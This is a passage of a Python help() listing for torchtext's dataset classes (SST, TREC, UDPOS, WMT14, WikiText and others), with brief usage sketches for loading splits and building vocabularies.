|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
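
A short sketch for SST with the coarse 3-class labels (set fine_grained=True for 5 classes; the field and batch settings are assumptions):

from torchtext import data, datasets

TEXT = data.Field(lower=True)
LABEL = data.LabelField()

# train_subtrees=True would also include the sentiment-tagged subphrases.
train, valid, test = datasets.SST.splits(TEXT, LABEL, fine_grained=False)

TEXT.build_vocab(train)
LABEL.build_vocab(train)  # 'positive', 'negative', 'neutral'

train_iter, valid_iter, test_iter = data.BucketIterator.splits(
    (train, valid, test), batch_size=64)
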
class SequenceTaggingDataset(torchtext.data.dataset.Dataset)
| SequenceTaggingDataset(path, fields, encoding='utf-8', separator='\t', **kwargs)
|
| Defines a dataset for sequence tagging. Examples in this dataset
| contain paired lists -- paired list of words and tags.
|
| For example, in the case of part-of-speech tagging, an example is of the
| form
| [I, love, PyTorch, .] paired with [PRON, VERB, PROPN, PUNCT]
|
| See torchtext/test/sequence_tagging.py on how to use this class.
|
| Method resolution order:
| SequenceTaggingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, fields, encoding='utf-8', separator='\t', **kwargs)
 |       Create a sequence tagging dataset from a column-formatted file.
 |
 |       Arguments:
 |           path: Path to the data file. Columns are separated by `separator`
 |               and blank lines separate examples.
 |           fields (list(tuple(str, Field))): The (name, field) pairs to use;
 |               the i-th column of the file is bound to the i-th pair.
 |           encoding: Encoding of the data file. Default: 'utf-8'.
 |           separator: Column separator within a line. Default: '\t'.
 |           Remaining keyword arguments: Passed to the constructor of data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(example)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| splits(path=None, root='.data', train=None, validation=None, test=None, **kwargs) from builtins.type
| Create Dataset objects for multiple splits of a dataset.
|
| Arguments:
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root (str): Root dataset storage directory. Default is '.data'.
| train (str): Suffix to add to path for the train set, or None for no
| train set. Default is None.
| validation (str): Suffix to add to path for the validation set, or None
| for no validation set. Default is None.
| test (str): Suffix to add to path for the test set, or None for no test
| set. Default is None.
| Remaining keyword arguments: Passed to the constructor of the
| Dataset (sub)class being used.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if provided.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
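
A sketch of building a tagging dataset from a local column-formatted file (the file name `pos_corpus.tsv` and its two-column word/tag layout are assumptions; blank lines separate sentences):

from torchtext import data, datasets

WORD = data.Field(lower=True)
TAG = data.Field(unk_token=None)

# Columns in the file are bound positionally to the (name, field) pairs.
tagging_data = datasets.SequenceTaggingDataset(
    path="pos_corpus.tsv",
    fields=[("word", WORD), ("tag", TAG)],
    separator="\t")

WORD.build_vocab(tagging_data)
TAG.build_vocab(tagging_data)
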
class TREC(torchtext.data.dataset.Dataset)
| TREC(path, text_field, label_field, fine_grained=False, **kwargs)
|
| Defines a dataset composed of Examples along with its Fields.
|
| Attributes:
| sort_key (callable): A key to use for sorting dataset examples for batching
| together examples with similar lengths to minimize padding.
| examples (list(Example)): The examples in this dataset.
| fields (dict[str, Field]): Contains the name of each column or field, together
| with the corresponding Field object. Two fields with the same Field object
| will have a shared vocabulary.
|
| Method resolution order:
| TREC
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, text_field, label_field, fine_grained=False, **kwargs)
 |       Create a TREC dataset instance given a path and fields.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| label_field: The field that will be used for label data.
| fine_grained: Whether to use the fine-grained (50-class) version of TREC
| or the coarse grained (6-class) version.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| iters(batch_size=32, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the TREC dataset.
|
| Arguments:
 |             batch_size: Batch size.
 |             device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that contains the trec dataset subdirectory
| vectors: one of the available pretrained vectors or a list with each
| element one of the available pretrained vectors (see Vocab.load_vectors)
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, label_field, root='.data', train='train_5500.label', test='TREC_10.label', **kwargs) from builtins.type
| Create dataset objects for splits of the TREC dataset.
|
| Arguments:
| text_field: The field that will be used for the sentence.
| label_field: The field that will be used for label data.
| root: Root dataset storage directory. Default is '.data'.
| train: The filename of the train data. Default: 'train_5500.label'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'TREC_10.label'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'trec'
|
| urls = ['http://cogcomp.org/Data/QA/QC/train_5500.label', 'http://cogc...
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
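
A TREC sketch; note that splits returns only a train and a test set here (the field settings and batch size are assumptions):

from torchtext import data, datasets

TEXT = data.Field(lower=True)
LABEL = data.LabelField()

# fine_grained=True switches from the 6 coarse classes to the 50 fine-grained ones.
train, test = datasets.TREC.splits(TEXT, LABEL, fine_grained=False)

TEXT.build_vocab(train)
LABEL.build_vocab(train)

train_iter, test_iter = data.BucketIterator.splits((train, test), batch_size=64)
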
class TextClassificationDataset(torch.utils.data.dataset.Dataset)
| TextClassificationDataset(vocab, data, labels)
|
 |     Defines an abstract text classification dataset.
| Currently, we only support the following datasets:
|
| - AG_NEWS
| - SogouNews
| - DBpedia
| - YelpReviewPolarity
| - YelpReviewFull
| - YahooAnswers
| - AmazonReviewPolarity
| - AmazonReviewFull
|
| Method resolution order:
| TextClassificationDataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __getitem__(self, i)
|
| __init__(self, vocab, data, labels)
 |       Initialize a text-classification dataset.
|
| Arguments:
| vocab: Vocabulary object used for dataset.
 |           data: a list of (label, tokens) tuples, where tokens is a tensor of
 |               numericalized string tokens and label is an integer, e.g.
 |               [(label1, tokens1), (label2, tokens2), (label2, tokens3)]
 |           labels: a set of the labels, e.g.
 |               {label1, label2}
|
| Examples:
| See the examples in examples/text_classification/
|
| __iter__(self)
|
| __len__(self)
|
| get_labels(self)
|
| get_vocab(self)
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
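
The concrete datasets listed above are exposed as factory functions in torchtext.datasets.text_classification; a hedged sketch with AG_NEWS (the root directory and ngrams value are arbitrary choices):

from torchtext.datasets import text_classification

# Each factory returns ready-made (train, test) TextClassificationDataset objects.
train_ds, test_ds = text_classification.DATASETS["AG_NEWS"](root=".data", ngrams=2)

vocab = train_ds.get_vocab()
labels = train_ds.get_labels()
label, tokens = train_ds[0]  # an integer label and a tensor of token ids
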
class TranslationDataset(torchtext.data.dataset.Dataset)
| TranslationDataset(path, exts, fields, **kwargs)
|
| Defines a dataset for machine translation.
|
| Method resolution order:
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Methods defined here:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Class methods defined here:
|
| splits(exts, fields, path=None, root='.data', train='train', validation='val', test='test', **kwargs) from builtins.type
| Create dataset objects for splits of a TranslationDataset.
|
| Arguments:
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| path (str): Common prefix of the splits' file paths, or None to use
| the result of cls.download(root).
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default: 'train'.
| validation: The prefix of the validation data. Default: 'val'.
| test: The prefix of the test data. Default: 'test'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Static methods defined here:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
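
A sketch of wrapping a pair of local parallel files directly with the constructor above (the prefix `corpus` and the extensions are placeholders):

from torchtext import data, datasets

SRC = data.Field(lower=True)
TRG = data.Field(lower=True, init_token="<sos>", eos_token="<eos>")

# Reads corpus.src and corpus.trg line by line as aligned sentence pairs.
parallel = datasets.TranslationDataset(
    path="corpus", exts=(".src", ".trg"), fields=(SRC, TRG))

SRC.build_vocab(parallel)
TRG.build_vocab(parallel)
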
class UDPOS(SequenceTaggingDataset)
| UDPOS(path, fields, encoding='utf-8', separator='\t', **kwargs)
|
| Defines a dataset for sequence tagging. Examples in this dataset
| contain paired lists -- paired list of words and tags.
|
| For example, in the case of part-of-speech tagging, an example is of the
| form
| [I, love, PyTorch, .] paired with [PRON, VERB, PROPN, PUNCT]
|
| See torchtext/test/sequence_tagging.py on how to use this class.
|
| Method resolution order:
| UDPOS
| SequenceTaggingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(fields, root='.data', train='en-ud-tag.v2.train.txt', validation='en-ud-tag.v2.dev.txt', test='en-ud-tag.v2.test.txt', **kwargs) from builtins.type
| Downloads and loads the Universal Dependencies Version 2 POS Tagged
| data.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'en-ud-v2'
|
| name = 'udpos'
|
| urls = ['https://bitbucket.org/sivareddyg/public/downloads/en-ud-v2.zi...
|
| ----------------------------------------------------------------------
| Methods inherited from SequenceTaggingDataset:
|
| __init__(self, path, fields, encoding='utf-8', separator='\t', **kwargs)
 |       Create a sequence tagging dataset from a column-formatted file.
 |
 |       Arguments:
 |           path: Path to the data file. Columns are separated by `separator`
 |               and blank lines separate examples.
 |           fields (list(tuple(str, Field))): The (name, field) pairs to use;
 |               the i-th column of the file is bound to the i-th pair.
 |           encoding: Encoding of the data file. Default: 'utf-8'.
 |           separator: Column separator within a line. Default: '\t'.
 |           Remaining keyword arguments: Passed to the constructor of data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from SequenceTaggingDataset:
|
| sort_key(example)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
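
Assuming the standard three-column layout of the bundled files (word, UD tag, PTB tag), splits takes three (name, field) pairs; a sketch with illustrative field names:

from torchtext import data, datasets

TEXT = data.Field(lower=True)
UD_TAGS = data.Field(unk_token=None)
PTB_TAGS = data.Field(unk_token=None)

fields = (("text", TEXT), ("udtags", UD_TAGS), ("ptbtags", PTB_TAGS))
train, valid, test = datasets.UDPOS.splits(fields)

TEXT.build_vocab(train, min_freq=2)
UD_TAGS.build_vocab(train)
PTB_TAGS.build_vocab(train)
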
class WMT14(TranslationDataset)
| WMT14(path, exts, fields, **kwargs)
|
| The WMT 2014 English-German dataset, as preprocessed by Google Brain.
|
| Though this download contains test sets from 2015 and 2016, the train set
| differs slightly from WMT 2015 and 2016 and significantly from WMT 2017.
|
| Method resolution order:
| WMT14
| TranslationDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| splits(exts, fields, root='.data', train='train.tok.clean.bpe.32000', validation='newstest2013.tok.bpe.32000', test='newstest2014.tok.bpe.32000', **kwargs) from builtins.type
| Create dataset objects for splits of the WMT 2014 dataset.
|
| Arguments:
| exts: A tuple containing the extensions for each language. Must be
| either ('.en', '.de') or the reverse.
| fields: A tuple containing the fields that will be used for data
| in each language.
| root: Root dataset storage directory. Default is '.data'.
| train: The prefix of the train data. Default:
| 'train.tok.clean.bpe.32000'.
| validation: The prefix of the validation data. Default:
| 'newstest2013.tok.bpe.32000'.
| test: The prefix of the test data. Default:
| 'newstest2014.tok.bpe.32000'.
| Remaining keyword arguments: Passed to the splits method of
| Dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = ''
|
| name = 'wmt14'
|
| urls = [('https://drive.google.com/uc?export=download&id=0B_bZck-ksdkp...
|
| ----------------------------------------------------------------------
| Methods inherited from TranslationDataset:
|
| __init__(self, path, exts, fields, **kwargs)
| Create a TranslationDataset given paths and fields.
|
| Arguments:
| path: Common prefix of paths to the data files for both languages.
| exts: A tuple containing the extension to path for each language.
| fields: A tuple containing the fields that will be used for data
| in each language.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Static methods inherited from TranslationDataset:
|
| sort_key(ex)
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
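
Usage mirrors the other translation datasets, only with the preprocessed BPE files and a much larger download; a brief sketch (vocabulary sizes are arbitrary):

from torchtext import data, datasets

SRC = data.Field()  # the files are already tokenized and BPE-encoded
TRG = data.Field()

train, valid, test = datasets.WMT14.splits(exts=(".en", ".de"), fields=(SRC, TRG))

SRC.build_vocab(train, max_size=32000)
TRG.build_vocab(train, max_size=32000)
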
class WikiText103(LanguageModelingDataset)
| WikiText103(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| Defines a dataset for language modeling.
|
| Method resolution order:
| WikiText103
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(batch_size=32, bptt_len=35, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the WikiText-103 dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| bptt_len: Length of sequences for backpropagation through time.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
 |                 expanded into; therefore the directory in whose wikitext-103
| subdirectory the data files will be stored.
| wv_dir, wv_type, wv_dim: Passed to the Vocab constructor for the
| text field. The word vectors are accessible as
| train.dataset.fields['text'].vocab.vectors.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, root='.data', train='wiki.train.tokens', validation='wiki.valid.tokens', test='wiki.test.tokens', **kwargs) from builtins.type
| Create dataset objects for splits of the WikiText-103 dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for text data.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-103
| subdirectory the data files will be stored.
| train: The filename of the train data. Default: 'wiki.train.tokens'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'wiki.valid.tokens'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'wiki.test.tokens'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'wikitext-103'
|
| name = 'wikitext-103'
|
| urls = ['https://s3.amazonaws.com/research.metamind.io/wikitext/wikite...
|
| ----------------------------------------------------------------------
| Methods inherited from LanguageModelingDataset:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
| or a list of numbers denoting the relative sizes of train, test and valid
| splits respectively. If the relative size for valid is missing, only the
| train-test split is returned. Default is 0.7 (for the train set).
| stratified (bool): whether the sampling should be stratified.
| Default is False.
| strata_field (str): name of the examples Field stratified over.
| Default is 'label' for the conventional label field.
| random_state (tuple): the random seed used for shuffling.
| A return value of `random.getstate()`.
|
| Returns:
| Tuple[Dataset]: Datasets for train, validation, and
| test splits in that order, if the splits are provided.
|
| ----------------------------------------------------------------------
| Class methods inherited from torchtext.data.dataset.Dataset:
|
| download(root, check=None) from builtins.type
| Download and unzip an online archive (.zip, .gz, or .tgz).
|
| Arguments:
| root (str): Folder to download data to.
| check (str or None): Folder whose existence indicates
| that the dataset has already been downloaded, or
| None to check the existence of root/{cls.name}.
|
| Returns:
| str: Path to extracted dataset.
|
| ----------------------------------------------------------------------
| Data and other attributes inherited from torchtext.data.dataset.Dataset:
|
| sort_key = None
|
| ----------------------------------------------------------------------
| Methods inherited from torch.utils.data.dataset.Dataset:
|
| __add__(self, other)
|
| ----------------------------------------------------------------------
| Data descriptors inherited from torch.utils.data.dataset.Dataset:
|
| __dict__
| dictionary for instance variables (if defined)
|
| __weakref__
| list of weak references to the object (if defined)
class WikiText2(LanguageModelingDataset)
| WikiText2(path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
|
| Defines a dataset for language modeling.
|
| Method resolution order:
| WikiText2
| LanguageModelingDataset
| torchtext.data.dataset.Dataset
| torch.utils.data.dataset.Dataset
| builtins.object
|
| Class methods defined here:
|
| iters(batch_size=32, bptt_len=35, device=0, root='.data', vectors=None, **kwargs) from builtins.type
| Create iterator objects for splits of the WikiText-2 dataset.
|
| This is the simplest way to use the dataset, and assumes common
| defaults for field, vocabulary, and iterator parameters.
|
| Arguments:
| batch_size: Batch size.
| bptt_len: Length of sequences for backpropagation through time.
| device: Device to create batches on. Use -1 for CPU and None for
| the currently active GPU device.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| wv_dir, wv_type, wv_dim: Passed to the Vocab constructor for the
| text field. The word vectors are accessible as
| train.dataset.fields['text'].vocab.vectors.
| Remaining keyword arguments: Passed to the splits method.
|
| splits(text_field, root='.data', train='wiki.train.tokens', validation='wiki.valid.tokens', test='wiki.test.tokens', **kwargs) from builtins.type
| Create dataset objects for splits of the WikiText-2 dataset.
|
| This is the most flexible way to use the dataset.
|
| Arguments:
| text_field: The field that will be used for text data.
| root: The root directory that the dataset's zip archive will be
| expanded into; therefore the directory in whose wikitext-2
| subdirectory the data files will be stored.
| train: The filename of the train data. Default: 'wiki.train.tokens'.
| validation: The filename of the validation data, or None to not
| load the validation set. Default: 'wiki.valid.tokens'.
| test: The filename of the test data, or None to not load the test
| set. Default: 'wiki.test.tokens'.
|
| ----------------------------------------------------------------------
| Data and other attributes defined here:
|
| dirname = 'wikitext-2'
|
| name = 'wikitext-2'
|
| urls = ['https://s3.amazonaws.com/research.metamind.io/wikitext/wikite...
|
| ----------------------------------------------------------------------
| Methods inherited from LanguageModelingDataset:
|
| __init__(self, path, text_field, newline_eos=True, encoding='utf-8', **kwargs)
| Create a LanguageModelingDataset given a path and a field.
|
| Arguments:
| path: Path to the data file.
| text_field: The field that will be used for text data.
| newline_eos: Whether to add an <eos> token for every newline in the
| data file. Default: True.
| Remaining keyword arguments: Passed to the constructor of
| data.Dataset.
|
| ----------------------------------------------------------------------
| Methods inherited from torchtext.data.dataset.Dataset:
|
| __getattr__(self, attr)
|
| __getitem__(self, i)
|
| __iter__(self)
|
| __len__(self)
|
| filter_examples(self, field_names)
| Remove unknown words from dataset examples with respect to given field.
|
| Arguments:
| field_names (list(str)): Within example only the parts with field names in
| field_names will have their unknown words deleted.
|
| split(self, split_ratio=0.7, stratified=False, strata_field='label', random_state=None)
| Create train-test(-valid?) splits from the instance's examples.
|
| Arguments:
| split_ratio (float or List of floats): a number [0, 1] denoting the amount
| of data to be used for the training split (rest is used for test),
